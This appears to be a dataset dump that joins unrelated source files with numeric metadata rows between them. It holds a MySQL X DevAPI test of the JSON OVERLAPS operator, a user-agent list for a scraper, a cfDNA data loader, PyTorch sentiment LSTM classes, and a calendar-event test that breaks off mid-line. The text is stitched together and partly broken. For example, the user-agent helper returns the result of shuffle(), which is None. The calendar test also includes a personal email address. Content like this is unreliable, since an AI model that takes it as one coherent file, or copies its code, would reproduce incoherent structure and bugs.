result = ( table.select() .where("c->'$.comp' OVERLAPS ['pqr','abc']") .execute() ) self.assertEqual(len(result.fetch_all()), 1) self.session.sql("drop table if exists t6").execute() @tests.foreach_session() def test_overlaps_table_select7(self): """OVERLAPS operator with different datatypes as operands.""" self.session.sql("create table t7(n JSON, a json, c JSON)").execute() table = self.schema.get_table("t7") table.insert().values( '{"name":"joy"}', '{"age":18}', '{"comp":"abc"}' ).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values( '{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}' ).execute() result = table.select().where("21 OVERLAPS n->'$.name'").execute() result1 = ( table.select().where("'b' OVERLAPS a->$.age").limit(1).execute() ) self.assertEqual(len(result.fetch_all()), 0) self.assertEqual(len(result1.fetch_all()), 0) self.session.sql("drop table if exists t7").execute() @tests.foreach_session() def test_overlaps_table_select8(self): """OVERLAPS operator with single element on LHS and array/list on RHS and vice versa.""" self.session.sql( "create table t8(id int, n JSON, a JSON, p JSON)" ).execute() table = self.schema.get_table("t8") table.insert().values( 1, '{"name":"a"}', '{"age":21}', '{"prof":["x","y"]}' ).values(2, '{"name":"b"}', '{"age":24}', '{"prof":["p","q"]}').values( 3, '{"name":"c"}', '{"age":26}', '{"prof":["l","m"]}' ).execute() result = ( table.select().where("a->$.age OVERLAPS [21,23,24,28]").execute() ) result1 = ( table.select() .where("n->'$.name' OVERLAPS ['a','b','c','d','e']") .execute() ) result2 = table.select().where("a->$.age OVERLAPS [(10+11)]").execute() result3 = ( table.select().where("21 OVERLAPS [22,23]").limit(1).execute() ) result4 = ( table.select().where("['p','q'] OVERLAPS p->'$.prof'").execute() ) self.assertEqual(len(result.fetch_all()), 2) self.assertEqual(len(result1.fetch_all()), 3) self.assertEqual(len(result2.fetch_all()), 1) self.assertEqual(len(result3.fetch_all()), 0) self.assertEqual(len(result4.fetch_all()), 1) self.session.sql("drop table if exists t8").execute() @tests.foreach_session() def test_overlaps_table_select9(self): """OVERLAPS operator with single element on LHS and dict on RHS and vice versa.""" self.session.sql("drop table if exists t9").execute() self.session.sql( "create table t9(id int, name varchar(20), a JSON, ai JSON)" ).execute() table = self.schema.get_table("t9") table.insert().values( 1, "a", '{"age":23}', '{"additionalinfo":["reading","music","playing"]}', ).values( 2, "b", '{"age":21}', '{"additionalinfo":["boxing","music"]}' ).execute() result = ( table.select() .where("'reading' OVERLAPS ai->$.additionalinfo") .execute() ) result1 = table.select().where("'music' OVERLAPS a->$.age").execute() result2 = ( table.select() .where("'music' OVERLAPS ai->$.additionalinfo") .execute() ) self.assertEqual(len(result.fetch_all()), 1) self.assertEqual(len(result1.fetch_all()), 0) self.assertEqual(len(result2.fetch_all()), 2) self.session.sql("drop table if exists t9").execute() @tests.foreach_session() def test_overlaps_table_select10(self): """OVERLAPS operator with array/list operand on LHS and array/list on RHS.""" self.session.sql("drop table if exists t10").execute() self.session.sql( "create table t10(i JSON, n JSON, a JSON, ai JSON)" ).execute() table = self.schema.get_table("t10") table.insert().values( '{"id":1}', '{"name":"joy"}', '{"age":21}', '{"additionalinfo":["reading","music","playing"]}', ).values( '{"id":2}', '{"name":"happy"}', '{"age":24}', '{"additionalinfo":["playing","painting","boxing"]}', ).execute() result = ( table.select() .where( "['playing','painting','boxing'] OVERLAPS ai->'$.additionalinfo'" ) .execute() ) result1 = ( table.select() .where('["happy","joy"] OVERLAPS n->$.name') .limit(1) .execute() ) result2 = ( table.select() .where('["reading"] NOT OVERLAPS ai->$.additionalinfo') .limit(1) .execute() ) self.assertEqual(len(result.fetch_all()), 2) self.assertEqual(len(result1.fetch_all()), 1) self.assertEqual(len(result2.fetch_all()), 1) self.session.sql("drop table if exists t10").execute() @tests.foreach_session() def test_overlaps_table_select11(self): """OVERLAPS operator with dict on LHS and dict on RHS.""" self.session.sql("drop table if exists t11").execute() self.session.sql( "create table t11(i JSON, n JSON, a JSON, ai JSON)" ).execute() table = self.schema.get_table("t11") table.insert().values( '{"id":1}', '{"name":"joy"}', '{"age":21}', '{"additionalinfo":[{"company":"xyz","vehicle":"bike"},{"company":"abc","vehicle":"car"},{"company":"mno","vehicle":"zeep"}]}', ).values( '{"id":2}', '{"name":"happy"}', '{"age":24}', '{"additionalinfo":[{"company":"abc","vehicle":"car"},{"company":"pqr","vehicle":"bicycle"}]}', ).execute() result = table.select( '{"company":"abc","vehicle":"car"} OVERLAPS ai->"$.additionalinfo"' ).execute() result1 = ( table.select() .where('{"vehicle":"car"} NOT OVERLAPS ai->"$.additionalinfo"') .execute() ) result2 = ( table.select() .where('{"company":"mno"} OVERLAPS ai->"$.additionalinfo"') .execute() ) self.assertEqual(len(result.fetch_all()), 2) self.assertEqual(len(result1.fetch_all()), 2) self.assertEqual(len(result2.fetch_all()), 0) self.session.sql("drop table if exists t11").execute() @tests.foreach_session() def test_overlaps_table_select12(self): """OVERLAPS operator with operands having expressions.""" self.session.sql("drop table if exists t12").execute() self.session.sql( "create table t12(id int, name varchar(20), age int)" ).execute() table = self.schema.get_table("t12") table.insert().values(1, "a", 21).values(2, "b", 22).values( 3, "c", 32 ).execute() result = ( table.select() .where("[(1>5)] OVERLAPS [true, false]") .limit(1) .execute() ) result1 = ( table.select() .where("[('a'>'b')] overlaps [true, false]") .limit(1) .execute() ) result2 = ( table.select() .where( "true OVERLAPS [(1>5), !(false), (true || false), (false && true)]" ) .limit(1) .execute() ) result3 = ( table.select() .where("cast((2+3) as JSON) OVERLAPS [1,2,3,4,5]") .limit(1) .execute() ) self.assertEqual(len(result.fetch_all()), 1) self.assertEqual(len(result1.fetch_all()), 1) self.assertEqual(len(result2.fetch_all()), 1) self.assertEqual(len(result3.fetch_all()), 1) self.session.sql("drop table if exists t12").execute() @tests.foreach_session() def test_overlaps_table_select13(self): """OVERLAPS operator with operands having expressions.""" self.session.sql("drop table if exists t13").execute() self.session.sql("create table t13(i json, n json, a json)").execute() table = self.schema.get_table("t13") table.insert().values('{"id":1}', '{"name":"a"}', '{"age":21}').values( '{"id":2}', '{"name":"b"}', '{"age":22}' ).execute() self.assertRaises( mysqlx.OperationalError, table.select().where("(1+5) OVERLAPS [1,2,3,4,5,6]").execute, ) # self.assertEqual(len(result.fetch_all()), 2) self.session.sql("drop table if exists t13").execute() @tests.foreach_session() def test_overlaps_table_select14(self): """OVERLAPS operator: search for empty string in a field and field in empty string.""" self.session.sql("drop table if exists t14").execute() self.session.sql("create table t14(id int, n JSON, age int)").execute() table = self.schema.get_table("t14") table.insert().values(1, '{"name":"a"}', 21).values( 2, '{"name":"b"}', 22 ).values(3, '{"name":"c"}', 32).execute() result = table.select().where("'' OVERLAPS n->'$.name'").execute() result1 = ( table.select().where("n->'$.name' OVERLAPS ['', ' ']").execute() ) self.assertEqual(len(result.fetch_all()), 0) self.assertEqual(len(result1.fetch_all()), 0) self.session.sql("drop table if exists t14").execute()
37.544902
139
0.549462
9,786
86,541
4.757306
0.04067
0.04891
0.062249
0.051036
0.93483
0.921254
0.907013
0.90102
0.876297
0.859585
0
0.028972
0.30084
86,541
2,304
140
37.561198
0.740455
0.066258
0
0.82046
0
0.001535
0.177134
0.019904
0
0
0
0
0.056266
1
0.048593
false
0.003069
0.002558
0
0.051662
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
d75a62e9cfe0af15bf0379feb85c4a43cdb3e57a
2,770
py
Python
webplucker/req_handler/agents/__init__.py
shivjeetbhullar/webplucker
b88a9a62932a2f9de3c62c2e0ec923dff1111ff7
[ "MIT" ]
null
null
null
webplucker/req_handler/agents/__init__.py
shivjeetbhullar/webplucker
b88a9a62932a2f9de3c62c2e0ec923dff1111ff7
[ "MIT" ]
null
null
null
webplucker/req_handler/agents/__init__.py
shivjeetbhullar/webplucker
b88a9a62932a2f9de3c62c2e0ec923dff1111ff7
[ "MIT" ]
null
null
null
from random import shuffle agents = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'] def getagent(): return {"User-Agent": shuffle(agents)}
461.666667
2,682
0.7213
533
2,770
3.746717
0.142589
0.115173
0.103655
0.241863
0.915373
0.915373
0.915373
0.897346
0.862293
0.862293
0
0.253419
0.102527
2,770
6
2,683
461.666667
0.549879
0
0
0
0
5.75
0.935042
0
0
0
0
0
0
1
0.25
false
0
0.25
0.25
0.75
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
1
0
0
1
1
1
0
0
0
0
0
1
1
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
15
d7712f265c56b382ef9e676dfb5c14a294c22aee
3,983
py
Python
glider/cfdna_glider.py
hillst/glider
499bbf64d97291c699eb4df1e2b57e24d0e90325
[ "MIT" ]
null
null
null
glider/cfdna_glider.py
hillst/glider
499bbf64d97291c699eb4df1e2b57e24d0e90325
[ "MIT" ]
null
null
null
glider/cfdna_glider.py
hillst/glider
499bbf64d97291c699eb4df1e2b57e24d0e90325
[ "MIT" ]
null
null
null
''' cfdna glider performs the QC and interpretation of cfDNA datas. This should be run on the cluster lol. ''' def load_all_data(datatype="union"): from glider.data.annotations import load_data data = [] data += load_data("BB053/trinuc_tsvs/BB053--BB1104." + datatype + ".tsv", biotype="control") data += load_data("BB053/trinuc_tsvs/BB053--BB1116." + datatype + ".tsv", biotype="control") data += load_data("BB053/trinuc_tsvs/BB053--BB1122." + datatype + ".tsv", biotype="control") data += load_data("BB053/trinuc_tsvs/BB053--BB1125." + datatype + ".tsv", biotype="control") data += load_data("BB053/trinuc_tsvs/BB053--BB1146." + datatype + ".tsv", biotype="control") data += load_data("BB342/trinuc_tsvs/BB342--BB1104." + datatype + ".tsv", biotype="control") data += load_data("BB342/trinuc_tsvs/BB342--BB1116." + datatype + ".tsv", biotype="control") data += load_data("BB342/trinuc_tsvs/BB342--BB1122." + datatype + ".tsv", biotype="control") data += load_data("BB342/trinuc_tsvs/BB342--BB1125." + datatype + ".tsv", biotype="control") data += load_data("BB342/trinuc_tsvs/BB342--BB1146." + datatype + ".tsv", biotype="control") data += load_data("BB427/trinuc_tsvs/BB427--BB1104." + datatype + ".tsv", biotype="control") data += load_data("BB427/trinuc_tsvs/BB427--BB1116." + datatype + ".tsv", biotype="control") data += load_data("BB427/trinuc_tsvs/BB427--BB1122." + datatype + ".tsv", biotype="control") data += load_data("BB427/trinuc_tsvs/BB427--BB1125." + datatype + ".tsv", biotype="control") data += load_data("BB427/trinuc_tsvs/BB427--BB1146." + datatype + ".tsv", biotype="control") data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1104." + datatype + ".tsv", biotype="control") data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1116." + datatype + ".tsv", biotype="control") data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1122." + datatype + ".tsv", biotype="control") data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1125." + datatype + ".tsv", biotype="control") data += load_data("BB600-cfDNA/trinuc_tsvs/BB600-cfDNA--BB1146." + datatype + ".tsv", biotype="control") data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1104." + datatype + ".tsv", biotype="control") data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1116." + datatype + ".tsv", biotype="control") data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1122." + datatype + ".tsv", biotype="control") data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1125." + datatype + ".tsv", biotype="control") data += load_data("BB601-cfDNA/trinuc_tsvs/BB601-cfDNA--BB1146." + datatype + ".tsv", biotype="control") data += load_data("BB672/trinuc_tsvs/BB672--BB1104." + datatype + ".tsv", biotype="control") data += load_data("BB672/trinuc_tsvs/BB672--BB1116." + datatype + ".tsv", biotype="control") data += load_data("BB672/trinuc_tsvs/BB672--BB1122." + datatype + ".tsv", biotype="control") data += load_data("BB672/trinuc_tsvs/BB672--BB1125." + datatype + ".tsv", biotype="control") data += load_data("BB672/trinuc_tsvs/BB672--BB1146." + datatype + ".tsv", biotype="control") data += load_data("Pre-BB1104/trinuc_tsvs/Pre-BB1104--BB1104." + datatype + ".tsv", biotype="luad") data += load_data("Pre-BB1116/trinuc_tsvs/Pre-BB1116--BB1116." + datatype + ".tsv", biotype="luad") data += load_data("Pre-BB1122/trinuc_tsvs/Pre-BB1122--BB1122." + datatype + ".tsv", biotype="luad") data += load_data("Pre-BB1125/trinuc_tsvs/Pre-BB1125--BB1125." + datatype + ".tsv", biotype="luad") data += load_data("Pre-BB1146/trinuc_tsvs/Pre-BB1146--BB1146." + datatype + ".tsv", biotype="luad") return data def load_test(): from glider.data.annotations import load_data, as_dataframe data = load_all_data("union") print len(data) print as_dataframe(data).describe() print len(load_test())
69.877193
108
0.680392
513
3,983
5.126706
0.097466
0.112548
0.159696
0.285171
0.847148
0.847148
0.847148
0.805323
0.689354
0.66654
0
0.103419
0.126036
3,983
56
109
71.125
0.652111
0
0
0
0
0
0.431302
0.333161
0
0
0
0
0
0
null
null
0
0.044444
null
null
0.066667
0
0
0
null
0
0
1
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
7
ad96c82e37324ab7b6f35d87f153137f1666ac5f
8,874
py
Python
models/LSTM.py
salmanedhi/NNTI-WS2021-NLP-Project
5b0a8f1258ef4e835a6e647082a8286078a0bdd6
[ "MIT" ]
null
null
null
models/LSTM.py
salmanedhi/NNTI-WS2021-NLP-Project
5b0a8f1258ef4e835a6e647082a8286078a0bdd6
[ "MIT" ]
null
null
null
models/LSTM.py
salmanedhi/NNTI-WS2021-NLP-Project
5b0a8f1258ef4e835a6e647082a8286078a0bdd6
[ "MIT" ]
null
null
null
import torch as torch from torch import nn class SentimentLSTM(nn.Module): def __init__(self, n_vocab, n_embed, n_hidden, n_output, n_layers, embedding_weights, drop_p = 0.5): super().__init__() # params: "n_" means dimension self.n_vocab = n_vocab # number of unique words in vocabulary self.n_layers = n_layers # number of LSTM layers self.n_hidden = n_hidden # number of hidden nodes in LSTM self.embedding = nn.Embedding(n_vocab, n_embed) #embeddings is a torch tensor. self.embedding.weight = nn.Parameter(embedding_weights, requires_grad = False) self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p) self.dropout = nn.Dropout(drop_p) self.fc = nn.Linear(n_hidden, n_output) self.sigmoid = nn.Sigmoid() def forward (self, input_words, batch_size): # INPUT : (batch_size, seq_length) embedded_words = self.embedding(input_words) # (batch_size, seq_length, n_embed) lstm_out, h = self.lstm(embedded_words) # (batch_size, seq_length, n_hidden) lstm_out = self.dropout(lstm_out) lstm_out = lstm_out.contiguous().view(-1, self.n_hidden) # (batch_size*seq_length, n_hidden) fc_out = self.fc(lstm_out) # (batch_size*seq_length, n_output) sigmoid_out = self.sigmoid(fc_out) # (batch_size*seq_length, n_output) sigmoid_out = sigmoid_out.view(batch_size, -1) # (batch_size, seq_length*n_output) # extract the output of ONLY the LAST output of the LAST element of the sequence sigmoid_last = sigmoid_out[:, -1] # (batch_size, 1) return sigmoid_last, h def init_hidden (self, batch_size, device): # initialize hidden weights (h,c) to 0 # device = "cuda" if torch.cuda.is_available() else "cpu" weights = next(self.parameters()).data h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device), weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device)) return h class SentimentLSTM_bengali(nn.Module): def __init__(self, n_vocab, n_embed, n_hidden, n_output, n_layers, embedding_weights, drop_p = 0.5): super().__init__() # params: "n_" means dimension self.n_vocab = n_vocab # number of unique words in vocabulary self.n_layers = n_layers # number of LSTM layers self.n_hidden = n_hidden # number of hidden nodes in LSTM self.embedding = nn.Embedding(n_vocab, n_embed) #embeddings is a torch tensor. self.embedding.weight = nn.Parameter(embedding_weights) self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p) self.dropout = nn.Dropout(drop_p) self.fc = nn.Linear(n_hidden, n_output) self.sigmoid = nn.Sigmoid() def forward (self, input_words, batch_size): # INPUT : (batch_size, seq_length) embedded_words = self.embedding(input_words) # (batch_size, seq_length, n_embed) lstm_out, h = self.lstm(embedded_words) # (batch_size, seq_length, n_hidden) lstm_out = self.dropout(lstm_out) lstm_out = lstm_out.contiguous().view(-1, self.n_hidden) # (batch_size*seq_length, n_hidden) fc_out = self.fc(lstm_out) # (batch_size*seq_length, n_output) sigmoid_out = self.sigmoid(fc_out) # (batch_size*seq_length, n_output) sigmoid_out = sigmoid_out.view(batch_size, -1) # (batch_size, seq_length*n_output) # extract the output of ONLY the LAST output of the LAST element of the sequence sigmoid_last = sigmoid_out[:, -1] # (batch_size, 1) return sigmoid_last, h def init_hidden (self, batch_size, device): # initialize hidden weights (h,c) to 0 # device = "cuda" if torch.cuda.is_available() else "cpu" weights = next(self.parameters()).data h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device), weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device)) return h class SentimentLSTM_task3(nn.Module): def __init__(self, n_vocab, batch_size, n_embed, n_hidden, n_output, n_layers, drop_p = 0.5): super().__init__() # params: "n_" means dimension self.n_vocab = n_vocab # number of unique words in vocabulary self.n_layers = n_layers # number of LSTM layers self.n_hidden = n_hidden # number of hidden nodes in LSTM self.embedding = nn.Embedding(n_vocab, n_embed) #embeddings is a torch tensor. # self.embedding.weight = nn.Parameter(embedding_weights, requires_grad = False) nn.Conv1d(in_channels=batch_size, out_channels=batch_size, kernel_size=1, stride=1) self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p) self.dropout = nn.Dropout(drop_p) self.fc = nn.Linear(n_hidden, n_output) self.sigmoid = nn.Sigmoid() def forward (self, input_words, batch_size): # INPUT : (batch_size, seq_length) embedded_words = self.embedding(input_words)# (batch_size, seq_length, n_embed) lstm_out, h = self.lstm(embedded_words) # (batch_size, seq_length, n_hidden) lstm_out = self.dropout(lstm_out) lstm_out = lstm_out.contiguous().view(-1, self.n_hidden) # (batch_size*seq_length, n_hidden) fc_out = self.fc(lstm_out) # (batch_size*seq_length, n_output) sigmoid_out = self.sigmoid(fc_out) # (batch_size*seq_length, n_output) sigmoid_out = sigmoid_out.view(batch_size, -1) # (batch_size, seq_length*n_output) # extract the output of ONLY the LAST output of the LAST element of the sequence sigmoid_last = sigmoid_out[:, -1] # (batch_size, 1) return sigmoid_last, h def init_hidden (self, batch_size, device): # initialize hidden weights (h,c) to 0 # device = "cuda" if torch.cuda.is_available() else "cpu" weights = next(self.parameters()).data h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device), weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device)) return h class SentimentLSTM_task3_bengali(nn.Module): def __init__(self, n_vocab, batch_size, n_embed, n_hidden, n_output, n_layers, embedding_weights, drop_p = 0.5): super().__init__() # params: "n_" means dimension self.n_vocab = n_vocab # number of unique words in vocabulary self.n_layers = n_layers # number of LSTM layers self.n_hidden = n_hidden # number of hidden nodes in LSTM self.embedding = nn.Embedding(n_vocab, n_embed) self.embedding.weight = nn.Parameter(embedding_weights) #embeddings is a torch tensor. # self.embedding.weight = nn.Parameter(embedding_weights, requires_grad = False) nn.Conv1d(in_channels=batch_size, out_channels=batch_size, kernel_size=1, stride=1) self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p) self.dropout = nn.Dropout(drop_p) self.fc = nn.Linear(n_hidden, n_output) self.sigmoid = nn.Sigmoid() def forward (self, input_words, batch_size): # INPUT : (batch_size, seq_length) embedded_words = self.embedding(input_words)# (batch_size, seq_length, n_embed) lstm_out, h = self.lstm(embedded_words) # (batch_size, seq_length, n_hidden) lstm_out = self.dropout(lstm_out) lstm_out = lstm_out.contiguous().view(-1, self.n_hidden) # (batch_size*seq_length, n_hidden) fc_out = self.fc(lstm_out) # (batch_size*seq_length, n_output) sigmoid_out = self.sigmoid(fc_out) # (batch_size*seq_length, n_output) sigmoid_out = sigmoid_out.view(batch_size, -1) # (batch_size, seq_length*n_output) # extract the output of ONLY the LAST output of the LAST element of the sequence sigmoid_last = sigmoid_out[:, -1] # (batch_size, 1) return sigmoid_last, h def init_hidden (self, batch_size, device): # initialize hidden weights (h,c) to 0 # device = "cuda" if torch.cuda.is_available() else "cpu" weights = next(self.parameters()).data h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device), weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device)) return h
49.575419
116
0.639959
1,240
8,874
4.287097
0.071774
0.098194
0.063205
0.094808
0.99003
0.99003
0.99003
0.981377
0.978743
0.978743
0
0.00546
0.25693
8,874
179
117
49.575419
0.800728
0.283638
0
0.918919
0
0
0
0
0
0
0
0
0
1
0.108108
false
0
0.018018
0
0.234234
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
ada0a18a20d5a2757694a3df16dea2d62364f995
6,173
py
Python
test_process_events.py
brianLeeson/proj10-MeetMe
d1262290e8bcad4b4e220490f8391bd8c26432eb
[ "Artistic-2.0" ]
null
null
null
test_process_events.py
brianLeeson/proj10-MeetMe
d1262290e8bcad4b4e220490f8391bd8c26432eb
[ "Artistic-2.0" ]
3
2021-02-08T20:17:15.000Z
2021-06-01T21:50:35.000Z
test_process_events.py
brianLeeson/proj10-MeetMe
d1262290e8bcad4b4e220490f8391bd8c26432eb
[ "Artistic-2.0" ]
null
null
null
from process_events import * def test_relevantEvents(): #Test 1 - normal. 1 event provided, 1 event created eventList = [{'organizer': {'email': 'cyberjunkie09@gmail.com', 'self': True, 'displayName': 'Brian Leeson'}, 'kind': 'calendar#event', 'id': '64o6cob56tj62b9hckqm8b9k71h62b9o6oq3cb9n6so62o9j61hj6ohp6g', 'start': {'timeZone': 'America/Los_Angeles', 'dateTime': '2016-11-16T06:00:00-08:00'}, 'updated': '2016-11-15T21:42:03.235Z', 'htmlLink': 'https://www.google.com/calendar/event?eid=NjRvNmNvYjU2dGo2MmI5aGNrcW04YjlrNzFoNjJiOW82b3EzY2I5bjZzbzYybzlqNjFoajZvaHA2ZyBjeWJlcmp1bmtpZTA5QG0', 'sequence': 0, 'summary': 'Running', 'creator': {'email': 'cyberjunkie09@gmail.com', 'self': True, 'displayName': 'Brian Leeson'}, 'iCalUID': '64o6cob56tj62b9hckqm8b9k71h62b9o6oq3cb9n6so62o9j61hj6ohp6g@google.com', 'etag': '"2958492246350000"', 'reminders': {'overrides': [{'method': 'popup', 'minutes': 30}], 'useDefault': False}, 'end': {'timeZone': 'America/Los_Angeles', 'dateTime': '2016-11-16T07:00:00-08:00'}, 'created': '2016-11-15T21:42:03.000Z', 'status': 'confirmed'}] rangeStart = "2016-01-01T00:00:00-08:00" rangeEnd = "2016-01-01T23:59:00-08:00" result = [{'organizer': {'email': 'cyberjunkie09@gmail.com', 'self': True, 'displayName': 'Brian Leeson'}, 'kind': 'calendar#event', 'id': '64o6cob56tj62b9hckqm8b9k71h62b9o6oq3cb9n6so62o9j61hj6ohp6g', 'start': {'timeZone': 'America/Los_Angeles', 'dateTime': '2016-11-16T06:00:00-08:00'}, 'updated': '2016-11-15T21:42:03.235Z', 'htmlLink': 'https://www.google.com/calendar/event?eid=NjRvNmNvYjU2dGo2MmI5aGNrcW04YjlrNzFoNjJiOW82b3EzY2I5bjZzbzYybzlqNjFoajZvaHA2ZyBjeWJlcmp1bmtpZTA5QG0', 'sequence': 0, 'summary': 'Running', 'creator': {'email': 'cyberjunkie09@gmail.com', 'self': True, 'displayName': 'Brian Leeson'}, 'iCalUID': '64o6cob56tj62b9hckqm8b9k71h62b9o6oq3cb9n6so62o9j61hj6ohp6g@google.com', 'etag': '"2958492246350000"', 'reminders': {'overrides': [{'method': 'popup', 'minutes': 30}], 'useDefault': False}, 'end': {'timeZone': 'America/Los_Angeles', 'dateTime': '2016-11-16T07:00:00-08:00'}, 'created': '2016-11-15T21:42:03.000Z', 'status': 'confirmed'}] assert( relevantEvents(eventList, rangeStart, rangeEnd)== result) #Test 2 - null. no event eventList = [] rangeStart = "2016-01-01T00:00:00-08:00" rangeEnd = "2016-01-01T23:59:00-08:00" assert(relevantEvents(eventList, rangeStart, rangeEnd) == [] ) def test_groupByDay(): #Test 1 - null. no events assert(groupByDay([])==[]) #Test 2 - Single event bEvents = [['2016-11-16T06:00:00-08:00', '2016-11-16T07:00:00-08:00']] bGrouped = [[{'start': '2016-11-16T06:00:00-08:00', 'end': '2016-11-16T07:00:00-08:00'}]] assert(groupByDay(bEvents) == bGrouped) #Test 3 - Multiple days bEvents = [['2016-11-17T18:00:00-08:00', '2016-11-17T19:00:00-08:00'], ['2016-11-17T17:45:00-08:00', '2016-11-17T18:45:00-08:00'], ['2016-11-16T06:00:00-08:00', '2016-11-16T07:00:00-08:00']] bGrouped = [[{'end': '2016-11-16T07:00:00-08:00', 'start': '2016-11-16T06:00:00-08:00'}], [{'end': '2016-11-17T18:45:00-08:00', 'start': '2016-11-17T17:45:00-08:00'}, {'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T18:00:00-08:00'}]] assert(groupByDay(bEvents) == bGrouped) def test_mergeBusy(): #Test1 - multiple events. some needed merging gEvents = [[{'end': '2016-11-16T07:00:00-08:00', 'start': '2016-11-16T06:00:00-08:00'}], [{'end': '2016-11-17T18:45:00-08:00', 'start': '2016-11-17T17:45:00-08:00'}, {'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T18:00:00-08:00'}]] mBlocks = [[{'end': '2016-11-16T07:00:00-08:00', 'start': '2016-11-16T06:00:00-08:00', 'summary': 'Busy'}], [{'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T17:45:00-08:00', 'summary': 'Busy'}]] assert(mergeBusy(gEvents) == mBlocks) #Test2 - null. no events gEvents = [] mBlocks = [] assert(mergeBusy(gEvents) == mBlocks) def test_addFree(): #Test1 - null bBlocks = [] sTime = "2016-01-01T00:00:00-08:00" eTime = "2016-01-01T23:59:00-08:00" sDate = "2016-11-17T00:00:00-08:00" eDate = "2016-11-18T00:00:00-08:00" fBSorted = [[{'end': '2016-11-17T23:59:00-08:00', 'start': 